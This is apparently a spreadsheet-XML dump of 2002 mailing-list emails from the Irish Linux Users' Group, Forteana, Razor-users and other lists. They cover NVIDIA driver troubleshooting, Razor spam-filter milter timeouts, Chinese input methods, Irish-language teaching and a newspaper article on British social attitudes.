    <t>Wed, 4 Dec 2002 11:20:29 -0000</t>
  </si>
  <si>
    <t>"Carlos Luna" &lt;carlos.luna@steorn.com&gt;</t>
  </si>
  <si>
    <t>&lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] dual keyboards</t>
  </si>
  <si>
    <t>Hi all.\nDoes anyone know how to set up dual keyboards(one is actually a stand-alone\nkeypad)?\nBoth keyboards have PS/2 connections and I want the keypad to be plugged in\nas the primary input device.  Then if the other keyboard is plugged in, that\nshould take over.\nPossible?  Any possible hacks?\nThanks!\nCarlos\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Forteana@Yahoogroups.Com" &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Bob Rickard" &lt;rickard@forteantimes.com&gt;\nDate: Wed, 4 Dec 2002 11:07:14 -0000</t>
  </si>
  <si>
    <t>Wed, 4 Dec 2002 11:07:14 -0000</t>
  </si>
  <si>
    <t>"Bob Rickard" &lt;rickard@forteantimes.com&gt;</t>
  </si>
  <si>
    <t>"Forteana@Yahoogroups.Com" &lt;zzzzteana@yahoogroups.com&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] must see</t>
  </si>
  <si>
    <t>here, for your enjoyment, is a little something discovered by my daughter\nKim.\n\n[URL]http://www.b3ta.com[/URL]\n\nb\n---\nOutgoing mail is certified Virus Free.\nChecked by AVG anti-virus system ([URL]http://www.grisoft.com[/URL]\nVersion: 6.0.404 / Virus Database: 228 - Release Date: 15/10/2002\n\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.b3ta.com http://www.grisoft.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: Yahoogroups Forteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: Joe McNally &lt;joe@flaneur.org.uk&gt;\nDate: Wed, 4 Dec 2002 10:54:44 +0000</t>
  </si>
  <si>
    <t>Wed, 4 Dec 2002 10:54:44 +0000</t>
  </si>
  <si>
    <t>Joe McNally &lt;joe@flaneur.org.uk&gt;</t>
  </si>
  <si>
    <t>Yahoogroups Forteana &lt;zzzzteana@yahoogroups.com&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] By the way</t>
  </si>
  <si>
    <t>What the hell is it with these mini remote control cars? Not only has \nmy mailbox been full of spam advertising them, but there's a fairly \nlarge stall selling them at Paddington station.\n-- \n  Joe McNally :: Flaneur at Large :: [URL]http://www.flaneur.org.uk[/URL]\n--\n"What's orange and looks good on hippies? Fire." - Steve Albini\n--\nCurrently playing: nothing.\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.flaneur.org.uk http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "dino" &lt;dinouk@orange.net&gt;\nDate: Wed, 4 Dec 2002 10:45:51 -0000</t>
  </si>
  <si>
    <t>Wed, 4 Dec 2002 10:45:51 -0000</t>
  </si>
  <si>
    <t>"dino" &lt;dinouk@orange.net&gt;</t>
  </si>
  <si>
    <t>&lt;zzzzteana@yahoogroups.com&gt;</t>
  </si>
  <si>
    <t>RE: [zzzzteana] Re: FWD (ExT) USA more popular than ever in Britain</t>
  </si>
  <si>
    <t>Now then I recently read a novel about exactly that sorta thing happening. Can't remember what is was called tho..maybe something like 51st State? -----Original Message----- From: Andrew Dennis [mailto:andrew@fidai.clara.net]  Sent: 03 December 2002 08:36 To: zzzzteana@yahoogroups.com Subject: [zzzzteana] Re: FWD (ExT) USA more popular than ever in Britain --- In forteana@y..., "uncle_slacky"  wrote: &gt; --- In forteana@y..., Andy  wrote: &gt; &gt; then the result would be a resounding 3. &gt;  &gt; It wouldn't be such a bad idea, because (at least in terms of trade)  &gt; we have all the disadvantages of a client state combined with all the  &gt; disadvantages of being a foreign country. &gt;  &gt; Rob &gt;  &gt; airstrip one, anyone? Not a bad idea at all, provided we avoid Texas's mistake.  If we get  two senators for each of Scotland, Norn Iron, Wales and England, plus  our fair share of congressthings, we end up with the biggest voting  block in the US legislature and for the presidency, with a political  spectrum whose extreme right can't poke the extreme left of the  current US one with a long, long stick.  One sudden lurch to the left  by the US political establishment later, we own the place. Byzantium, anyone? Andrew D. To unsubscribe from this group, send an email to: forteana-unsubscribe@egroups.com   Your use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]  To unsubscribe from this group, send an email to: forteana-unsubscribe@egroups.com   Your use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://docs.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "dino" &lt;dinouk@orange.net&gt;\nDate: Wed, 4 Dec 2002 10:41:59 -0000</t>
  </si>
  <si>
    <t>Wed, 4 Dec 2002 10:41:59 -0000</t>
  </si>
  <si>
    <t>RE: [zzzzteana] More Michael Jackson wierdness</t>
  </si>
  <si>
    <t>I have to say I was surprised about Jacko dangling that kid of the\nbalcony.\nUsually he just tosses them off...\n\nBoomboom.\n\nD\n\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;\nDate: Wed, 4 Dec 2002 10:36:17 -0000</t>
  </si>
  <si>
    <t>Wed, 4 Dec 2002 10:36:17 -0000</t>
  </si>
  <si>
    <t>"Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;</t>
  </si>
  <si>
    <t>zzzzteana@yahoogroups.com</t>
  </si>
  <si>
    <t>[zzzzteana] University boom creates era of sexual tolerance</t>
  </si>
  <si>
    <t>The Times\n\n \n December 04, 2002 \n \n University boom creates era of sexual tolerance\n\n By Helen Rumbelow\n \n \n \n THE boom in university education has led to a sea change in Britains\n tolerance of homosexuality, according to a report. Just under half the people\n now believe that homosexuality is always or mostly wrong, down from three\n quarters 15 years ago, according to the British Social Attitudes survey,\n regarded as one of the best indicators of popular opinion. \n \n That trend is mirrored by the attitude towards ethnic minorities, with 75 per\n cent of people now saying they are not at all racially prejudiced, compared\n with 60 per cent in 1987. \n \n Geoffrey Evans, a politics professor at Oxford University, decided to focus on\n what has caused Britain to become more open-minded in a report published\n today. The study, from the National Centre for Social Research, is based on\n interviews with a cross-section of 3,500 people. \n \n Young people are much more tolerant than their elders, with a quarter of\n twentysomethings believing that homosexual sex is always wrong, compared with\n two thirds of pensioners. \n \n But the key to converting a bigot is to send him or her to college, with\n graduates twice as accepting of homosexuals as those with no GCSEs, and a\n third less racist. \n \n That transformation happened no matter what social class the student came from\n and, with 41 per cent of young people now attending university, it was a\n powerful social effect, Professor Evans said. \n \n Mr Blairs famous mantra education, education, education seems far less\n consequential now than when first announced in 1997, as Britain struggles with\n an overburdened health service and the reality that as more and more people\n get degrees, degrees buy less and less, he said. \n \n But the growth of higher education can provide a bulwark against the\n undermining of liberal democracy through intolerance, he added. \n \n He decided to see whether the tolerance conferred by schooling was just\n political correctness by testing how many civil rights the educated would\n give to an unattractive minority: white supremacists. \n \n Again, people scored higher the longer they had spent at school and\n university, with nearly two thirds of graduates saying that white supremacists\n should have the right to give television interviews or stand in elections,\n three times as many as those with no qualifications. \n \n It is not clear why those with higher education are more tolerant, the report\n says, adding that it may be simply because university students have increased\n contact with alternative points of view. \n \n Professor Evans also looked at whether the young may grow out of their\n idealism, but found the opposite to be true. \n \n Thirtysomethings were more than twice as likely to say there was nothing wrong\n with homosexuality as they were when they were in their early twenties. He\n said that as these groups of more educated young people replaced the older\n generation, Britain would become an ever more relaxed place. \n \n Soft drugs have also grown in widespread acceptability, with more than half\n the country wanting cannabis to be legalised, compared with a third seven\n years ago. That is probably because the use of cannabis is now so widespread,\n with a quarter of those surveyed saying that they had tried it. \n \n A third of Labour voters, twice as many as Conservatives, had tried the drug,\n and being young, living in London and having a degree also increased the\n chances. \n \n One issue that bucks the trend is hard drugs. Most take a strong position on\n heroin that has got stronger over the past seven years. Now the proportion of\n people who believe that heroin dealers should always be prosecuted has crept\n up to 97 per cent. \n \n The views on heroin show that Britain is by no means becoming a liberal\n free-for-all, Alison Park, co-director of the study, said. People are making\n quite a clear distinction between what they think (of) as right and wrong. \n \n On other matters, the survey indicates that almost half those questioned think\n that most of the social security budget goes on unemployment benefits  in\n fact, they account for 6 per cent; that union membership has fallen by a fifth\n in the past 18 years, with just under a third of workers in a union; and that\n half those questioned oppose secondary school selection. In 1984 the figure\n was 40 per cent. \n \n The survey also indicates that 19 per cent of men aged between 25 and 34 live\n with their parents, twice as many as women.\n \n \n \n\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Conor_D_Wynne@Dell.com\nDate: Wed, 4 Dec 2002 04:05:38 -0600</t>
  </si>
  <si>
    <t>Wed, 4 Dec 2002 04:05:38 -0600</t>
  </si>
  <si>
    <t>Conor_D_Wynne@Dell.com</t>
  </si>
  <si>
    <t>RE: [ILUG] NVIDIA and Debian Woody</t>
  </si>
  <si>
    <t>Hi there,\n\nNow this is probably of no use to you whatsoever, but...\n\nNot a deb-head, but I also have a problem regards NVidia. I've two machines,\npretty much the same hardware. \nathlon 1700XP's, both have NVidia cards, one Gforce3 Ti and a Gforce2MX,\nboth use the same driver module. \n\nBoth have same kernel version albeit it compiled for their particular\nhardware.\n\nOne works perfectly, the other fails to load. When I check with lsmod, I can\nsee the NVdriver is loaded, but not used ;--(\nThus when I startx, it bombs out. \n\nIU still have X with the default nv driver and crappy accelleration --&gt;\n650fps with glxgears [should be over 2000fps]\nIts not a hardware issue with the cards as I swapped them over and get the\nsame symptoms. \n\nI reckon my mobo is cack, I've tried swapping slots around, reserving\nresources etc all to no avail. \nShould there be an interrupt for the nv card? I haven't checked the other\nbox yet.\n\nRegards,\nCW\n\n-------------------\nOn Tue, 03 Dec 2002, Mark Page wrote:\n\n&gt; Was running Debian Woody perfectly well until I installed the NVIDIA 3D \n&gt; tar packages.\n\nYou probably stil are ;)\n\n&gt; Both the kernel and GLX packages installed with no problem and I then \n&gt; amended the XFree config file appropriately (according to all \n&gt; instructions). Neither GDM nor KDM will now fire up returning me to the \n&gt; console screen. \n\nie X is broken. \n\n&gt; Running startx I isolated the problem to a failure to load the nvidia\n&gt; kernel module - By cd'ing to the kernel module file and re-running 'make\n&gt; install' I can get a workable xserver \n\nso you fixed X.\n\n&gt; minus the preferences you would get from either gdm or kdm and to be\n&gt; honest the GUI is horrible.\n\nIf X is working and you get a brief Nvidia splash screen then this is\nlikely nothing to do with the driver itself.  You should be able to use kdm\nor gdm with the nvidia Xserver.  What exactly did you change in your\nXF86Config?  Will gdm/kdm not start?\n\n&gt; I followed the nvidia suggestion of 'make install \n&gt; SYSINCLUDE=/path/to/kernel/headers' and whilst this appears to install \n&gt; ok upon reboot I am back to the same console login and having to go \n&gt; through the same reinstall of the kernel module. I have tried rewriting \n&gt; the XF config file to it's original state with no success.\n\nWell, this sounds like the NVIDIA kernel module isn't loading on boot.\nWhen it *is* working do a quick \n\n/sbin/lsmod\n\nand look for the module name (something like 'NVDriver').  Then put this on\na new line in \n\n/etc/modules\n\nin order that linux will load it on boot.  You can just do\n\nmodprobe nvdriver\n\nto load it by hand.  Your make install did this as well as reinstalling the\ndriver in /lib etc.  You should also get a message saying loading the\nnvidia driver taints your kernel (which it does, in the sense that it's not\nopen source).\n\n&gt; Is this a problem anyone else has encountered and what is the best \n&gt; solution? Can I rid myself of the tar file installations and find some \n&gt; specific .deb packages?\n\nThe nvidia driver source is in the Woody tree.\n\n[URL]http://packages.debian.org[/URL]\n\nso you can do\n\napt-get install nvidia-kernel-src\n\nand then compile, although I've always gone the route you're doing now.\n\nIdeally the nvidia driver would be a part of the kernel from day 1.\nHowever, nvidia have not open sourced it (most of the above source is\npre-compiled object code), but in order for it to work with your specific\nkernel you must compile against your kernel headers (as you did).  As\ndebian has lots of potential kernels they can't have one nvdriver package\nand have chosen instead to provide the source.  Actually I don't know if\nthey're permitted to distribute binaries by nvidia's license anyway.\n\nGavin\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://packages.debian.org http://www.linux.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>BGD</t>
  </si>
  <si>
    <t>To: &lt;mail@vipul.net&gt;\nFrom: "Sven" &lt;sven@dmv.com&gt;\nDate: Wed, 31 Jul 2002 23:17:07 -0400</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 23:17:07 -0400</t>
  </si>
  <si>
    <t>Re: [Razor-users] Smrazor, Milter, and Max connections</t>
  </si>
  <si>
    <t>----- Original Message ----- From: "Vipul Ved Prakash"  To: "Sven"  Cc:  Sent: Wednesday, July 31, 2002 10:31 PM Subject: Re: [Razor-users] Smrazor, Milter, and Max connections &gt; On Wed, Jul 31, 2002 at 09:44:08PM -0400, Sven wrote: &gt; &gt; With v2.14 of razor client and using Solaris 9 with sendmail 8.12.5 I have &gt; &gt; managed to get smrazor working (milter) -- sort of ... With light server &gt; &gt; loads, it seems to do fine; however during peak traffic times (or peak &gt; &gt; catalogue server usage???) , the smrazor milter stops and sometime dumps &gt; &gt; core as well.  Does anyone know of a limit in terms of number of &gt; &gt; messages/minute that can be theoretically processed? I have noticed timeouts &gt; &gt; occuring (I set the milter timeout per message to 15 seconds) often in huge &gt; &gt; lumps and the occasional "Could not get valid info from Discovery Servers") &gt; &gt; ????? &gt; &gt; 15 seconds is more than enough timeout... There's no request/minute limit, &gt; and we are not close to hardware limits on any of the servers. &gt; &gt; Could you send me relevant sections from the log file as well as &gt; your config? &gt; &gt;&gt;From the maillog: Jul 31 22:52:20 cartman sendmail[21081]: [ID 801593 mail.error] g712pocb021081: Milter (smrazor): timeout before data read Jul 31 22:52:20 cartman sendmail[21081]: [ID 801593 mail.info] g712pocb021081: Milter (smrazor): to error state Jul 31 22:52:22 cartman sendmail[21091]: [ID 801593 mail.error] g712pocb021091: Milter (smrazor): timeout before data read Jul 31 22:52:22 cartman sendmail[21091]: [ID 801593 mail.info] g712pocb021091: Milter (smrazor): to error state &gt;&gt;From razor-agents.log Jul 31 17:35:43.637025 check[21171]: [ 1] razor-check error: nextserver: discover0: bootstrap_discovery: Jul 31 17:35:43.987175 check[21168]: [ 1] razor-check error: nextserver: discover0: bootstrap_discovery: Jul 31 18:36:34.652485 check[8241]: [ 1] razor-check error: nextserver: Could not get valid info from Discovery Servers Jul 31 22:01:09.162201 check[9973]: [ 1] razor-check error: nextserver: Could not get valid info from Discovery Servers &gt;&gt;From smrazor.err [07/31/2002 22:52:22] (1144) Error reading from razor-check (156a78) (21092): timeout [07/31/2002 22:52:42] (1144) Error reading from razor-check (16b948) (21221): timeout [07/31/2002 22:52:42] (1144) Error reading from razor-check (165348) (21227): timeout [07/31/2002 22:57:21] (1144) Error reading from razor-check (16d118) (22911): timeout razor-agent.conf # # Razor2 config file # # Autogenerated by Razor-Agents v2.14 # Wed Jul 31 11:38:43 2002 # Created with all default values # # see razor-agent.conf(5) man page # debuglevel             = 3 identity               = identity ignorelist             = 0 listfile_catalogue     = servers.catalogue.lst listfile_discovery     = servers.discovery.lst listfile_nomination    = servers.nomination.lst logfile                = /var/log/razor-agent.log min_cf                 = ac razorhome              = /etc/razor razorzone              = razor2.cloudmark.com rediscovery_wait       = 172800 report_headers         = 1 turn_off_discovery     = 0 use_engines            = 1,2,3,4 whitelist              = razor-whitelist Realizing that the above, after looking at it, is pretty much no help, changed debug to 9 and output the results to a text file. It is attached but the crux of the messages resemble: Jul 31 23:11:14.633544 check[5689]: [ 7] Can't read file servers.discovery.lst, looking relatve to Jul 31 23:11:14.634218 check[5689]: [ 5] Can't read file /servers.discovery.lst: No such file or directory  or Jul 31 23:07:19.115412 check[26156]: [ 6] no discovery listfile: servers.discovery.lst Jul 31 23:07:19.115878 check[26156]: [ 5] Finding Discovery Servers via DNS in the razor2.cloudmark.com zone Jul 31 23:07:19.174862 check[26155]: [ 8] Connection established Jul 31 23:07:19.175667 check[26155]: [ 4] 216.52.13.90 &gt;&gt; 29 server greeting: sn=N&amp;srl=30&amp;ep4=7542-10&amp;a=l Jul 31 23:07:19.176887 check[26155]: [ 4] 216.52.13.90 &lt;&lt; 12 Jul 31 23:07:19.177344 check[26155]: [ 6] a=gÂ±=csl Jul 31 23:07:19.214020 check[26124]: [ 6] Found 1 Discovery Servers via DNS in the razor2.cloudmark.com zone Jul 31 23:07:19.214729 check[26124]: [ 8] Checking with Razor Discovery Server 216.52.13.90 Jul 31 23:07:19.215383 check[26124]: [ 6] No proper port specified, using 2703 Jul 31 23:07:19.215833 check[26124]: [ 5] Connecting to 216.52.13.90 ... It would appear that even though there is a specified home directory, razor-check cannot read the .lst files and must apparently run discovery at each lookup????? This, btw, is occuring on two separate servers ... Sven ------------------------------------------------------- This sf.net email is sponsored by: Dice - The leading online job board for high-tech professionals. Search and apply for tech jobs today! [URL]http://seeker.dice.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Wed, 31 Jul 2002 21:50:56 -0700</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 21:50:56 -0700</t>
  </si>
  <si>
    <t>Brent Welch &lt;welch@panasas.com&gt;</t>
  </si>
  <si>
    <t>exmh-workers@spamassassin.taint.org</t>
  </si>
  <si>
    <t>scan bug: no update after Pick's "New FTOC"</t>
  </si>
  <si>
    <t>If you run Pick, and then use the "New FTOC" button to show only\nthose messages selected by pick, then the ftoc display was considered\n"invalid" in the old code.  This prevented the display from being cached,\nand it meant that you could get back to the full folder display by\nclicking on the folder lablel.  That doesn't work anymore.  You have\nto resort to Rescan Folder.  In fact, when you change folders you\ncontinue to have the Pick results, not the new folder contents.\nIf you go to a any folder and do Rescan, then it heals itself.\n--\nBrent Welch\nSoftware Architect, Panasas Inc\nPioneering the World's Most Scalable and Agile Storage Network\n[URL]www.panasas.com[/URL]\nwelch@panasas.com\n\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>www.panasas.com https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Sven" &lt;sven@dmv.com&gt;\nDate: Wed, 31 Jul 2002 21:44:08 -0400</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 21:44:08 -0400</t>
  </si>
  <si>
    <t>[Razor-users] Smrazor, Milter, and Max connections</t>
  </si>
  <si>
    <t>With v2.14 of razor client and using Solaris 9 with sendmail 8.12.5 I have\nmanaged to get smrazor working (milter) -- sort of ... With light server\nloads, it seems to do fine; however during peak traffic times (or peak\ncatalogue server usage???) , the smrazor milter stops and sometime dumps\ncore as well.  Does anyone know of a limit in terms of number of\nmessages/minute that can be theoretically processed? I have noticed timeouts\noccuring (I set the milter timeout per message to 15 seconds) often in huge\nlumps and the occasional "Could not get valid info from Discovery Servers")\n?????\n\nI am not using procmail because this [cluster of] server is a gateway on to\n5 different pop3 servers (5 different domains), ergo, local users won't work\nbecause of overlapping usernames ...(or insanely huge virtusertable to alias\nmappings .....)\n\nAlternatively does anyone have a working, high-capacity milter for this or\nany other related ideas???\n\nSve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ilug@linux.ie\nFrom: Nick Murtagh &lt;nickm@go2.ie&gt;\nDate: Wed, 31 Jul 2002 21:23:03 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 21:23:03 +0100</t>
  </si>
  <si>
    <t>Nick Murtagh &lt;nickm@go2.ie&gt;</t>
  </si>
  <si>
    <t>[OT] Irish language (was Re: [ILUG] Fwd: Linux Beer Hike)</t>
  </si>
  <si>
    <t>On Wednesday 31 July 2002 12:02, Satelle, StevenX wrote:\n&gt; Its nothing to do with irish. It was the way it was tought. In primary I\n&gt; was made to stand up in front of the class and name all the items on a\n&gt; projector screen. My teacher knew that I didnt even know what hello was in\n&gt; irish (still dont) They tried to force me and as a result I managed to get\n&gt; 1% in the intercert and didnt even turn up for the leaving exam. I dislike\n&gt; being forced to learn something and mostly refuse to do it. I put effort\n&gt; into making sure I didnt learn Irish. My point was I knew more German after\n&gt; 6 months than 13 years of Irish. The way it is tought is wrong and people\n&gt; should have a choice about doing it.\n\nIrish is taught badly in schools. But then again so is French. I did 3 years\nof French in primary school and 6 in secondary school. So, that's 9 years of\nFrench. Which, I guess, should be long enough to be fluent in most languages.\nAs it turns out, my French is crap. My Irish is much better. \n\nThe problem seems to be the braindead attempt to make people learn languages\nthey can't speak through reading and writing. And then tacking on speech as\nan afterthought. Whereas doing it the other way round would be a lot more\nuseful...\n\nI hear this complaint a lot, but I never hear people complaining about being\n"forced" to learn to read and write, or to do maths. Maybe people don't mind\nas much if it is perceived as a useful skill (which Irish is not usually\nperceived as).\n\nAnyway, tir gan teanga tir gan anam :)\n\nNick\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Irish Linux Users Group &lt;ilug@linux.ie&gt;\nFrom: Brian Foster &lt;blf@utvinternet.ie&gt;\nDate: Wed, 31 Jul 2002 20:58:43 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 20:58:43 +0100</t>
  </si>
  <si>
    <t>Brian Foster &lt;blf@utvinternet.ie&gt;</t>
  </si>
  <si>
    <t>Irish Linux Users Group &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] inputting chinese characters in Redhat 7.3</t>
  </si>
  <si>
    <t>| Date: Wed, 31 Jul 2002 18:57:50 +0100   | From: Brian Foster    |    |   | Date: Wed, 31 Jul 2002 23:11:49 +0800   |   | From: Fergal Daly    |   |    |   | 7.3 seems to support Chinese input out of the box, it's got   |   | miniChinput and some other stuff no documentation.  [ ... ]   |   | Can anyone tell me what I should do?   |    |  I've no idea, but a relevant/useful source of info could   |  be the Â«linux-utf8Â» e-list:   |    |      [URL]http://www.cl.cam.ac.uk[/URL]   |      [URL]http://mail.nl.linux.org[/URL]   |[ ... ]   |  w.r.t. X11 applications [ one approach is to use ]   |  what's called an XIM (X Input Method).   [ ... ]  sorry for replying to my own post!  a google for "xim linux" found a number of hits.  try (I've haven't finished reading this myself,  but it seems good):    [URL]http://www.suse.de[/URL]  (CJK stands for Chinese Japanese Korean.)  the above is probably best read with a browser  that groks UTF-8. cheers! 	-blf- --  Innovative, very experienced, Unix and      | Brian Foster    Dublin, Ireland  Chorus (embedded RTOS) kernel internals     | e-mail: blf@utvinternet.ie  expert looking for a new position ...       | mobile: (+353 or 0)86 854 9268   For a rÃ©sumÃ©, contact me, or see my website  [URL]http://www.blf.utvinternet.ie[/URL]     Stop E$$o (ExxonMobile):  Â«Whatever you do, don't buy Esso --- they      don't give a damn about global warming.Â»    [URL]http://www.stopesso.com[/URL]      Supported by Greenpeace, Friends of the Earth, and numerous others... --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.cl.cam.ac.uk http://mail.nl.linux.org http://www.suse.de http://www.blf.utvinternet.ie http://www.stopesso.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Sven &lt;sven@dmv.com&gt;\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Wed, 31 Jul 2002 19:31:46 -0700</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 19:31:46 -0700</t>
  </si>
  <si>
    <t>Sven &lt;sven@dmv.com&gt;</t>
  </si>
  <si>
    <t>On Wed, Jul 31, 2002 at 09:44:08PM -0400, Sven wrote:\n&gt; With v2.14 of razor client and using Solaris 9 with sendmail 8.12.5 I have\n&gt; managed to get smrazor working (milter) -- sort of ... With light server\n&gt; loads, it seems to do fine; however during peak traffic times (or peak\n&gt; catalogue server usage???) , the smrazor milter stops and sometime dumps\n&gt; core as well.  Does anyone know of a limit in terms of number of\n&gt; messages/minute that can be theoretically processed? I have noticed timeouts\n&gt; occuring (I set the milter timeout per message to 15 seconds) often in huge\n&gt; lumps and the occasional "Could not get valid info from Discovery Servers")\n&gt; ?????\n\n15 seconds is more than enough timeout... There's no request/minute limit,\nand we are not close to hardware limits on any of the servers.\n\nCould you send me relevant sections from the log file as well as\nyour config?\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibso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http://vipul.net http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "ILUG (Request)" &lt;ilug@linux.ie&gt;\nFrom: David Neary &lt;dneary@wanadoo.fr&gt;\nDate: Wed, 31 Jul 2002 19:25:27 +0200</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 19:25:27 +0200</t>
  </si>
  <si>
    <t>David Neary &lt;dneary@wanadoo.fr&gt;</t>
  </si>
  <si>
    <t>"ILUG (Request)" &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] Re: C++ and C Mailing Lists for Beginners and Advanced</t>
  </si>
  <si>
    <t>SoloCDM wrote:\n&gt; David Neary stated the following:\n&gt; &gt; Try the following newsgroups - Beginners: news:comp.lang.learn.c-c++\n&gt; \n&gt; I tried news:comp.lang.learn.c-c++ and it wouldn't work.  Is there a\n&gt; typo?\n\nYup. It's alt.comp.lang.learn.c-c++ Sorry about that.\n\nI've never used the group, so I can't vouch for it's usefulness.\nBut a few people I respect a lot direct people there for beginner\ntype stuff.\n\nCheers,\nDave.\n\n-- \n       David Neary,\n    Marseille, France\n  E-Mail: bolsh@gimp.org\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Wed, 31 Jul 2002 19:01:56 +0200</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 19:01:56 +0200</t>
  </si>
  <si>
    <t>Re: Two questions</t>
  </si>
  <si>
    <t>Once upon a time, Matthias wrote : &gt; For that n2, it's simple : They've been pulled out from the upstream &gt; xine source. I guess I should make a "xine-skins" package if there is &gt; enough demand for it ;-) Well, replying to my own post, sorry ;-) There is now a 1.3MB xine-skins package that includes all the available skins that can be found on the xine website. Time to "apt-get install xine-skins" for those who started to miss xinetic or lcd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Irish Linux Users Group &lt;ilug@linux.ie&gt;\nFrom: Brian Foster &lt;blf@utvinternet.ie&gt;\nDate: Wed, 31 Jul 2002 18:57:50 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 18:57:50 +0100</t>
  </si>
  <si>
    <t>| Date: Wed, 31 Jul 2002 23:11:49 +0800   | From: Fergal Daly    |    | 7.3 seems to support Chinese input out of the box, it's got   | miniChinput and some other stuff no documentation.  [ ... ]   | google is a bit of a dead too.   |    | Can anyone tell me what I should do?  I've no idea, but a relevant/useful source of info could  be the Â«linux-utf8Â» e-list:      [URL]http://www.cl.cam.ac.uk[/URL]      [URL]http://mail.nl.linux.org[/URL]  whilst the list is nominally about UTF-8/Unicode and Linux,  it often delves into related areas (such as input methods).  my (vague!) understanding of the state-of-play is there are  multiple ways of keyboarding scripts such as "Chinese", and  the choice of method is a mixture of personal preference,  equipment (e.g. your keyboard), and the tool/application  in question.  w.r.t. X11 applications, it seems to boil down to two  approaches:   one unique to the tool itself (apparently  `yudit' is famous for this);  or  else using what's called  an XIM (X Input Method).   WARNING: I am now guessing quite a bit here, based mostly on            my interpretation of what I've read whilst lurking,            and watching a few people keyboarding a Japanese            script years ago!   *** your mileage will vary! ***  XIMs generally work as a complex compose frontend.  i.e., you  build up your character as a series of composes of the root or  fundamental strokes ("radicals", I think they are called), and  then "commit" the composite character to the application.  ( yes, keyboarding these scripts _is_ quite slow, I believe   a good typist can only do a few characters a minute!   and I assume using a qwerty keyboard is very painful. )  some XIMs compose "in place", others do it on a special line,  and some seem to do it in a special window (or the root?).  also, some(/most?) XIMs apparently support a US-ASCII input  mode as well --- _not_ a general Latin-alphabet input mode,  which seems to require another TLA, called KBD, and which  apparently doesn't work when an XIM is also being used? ---  implying you have to switch back and forth between US-ASCII  input mode (what us English-speakers would call "normal"  keyboarding/typing), and the other input (e.g., Chinese).  I'm not sure, but I have the impression the switch is often  a toggle, and something like .  many apologies if this is completely wrong or too misleading. 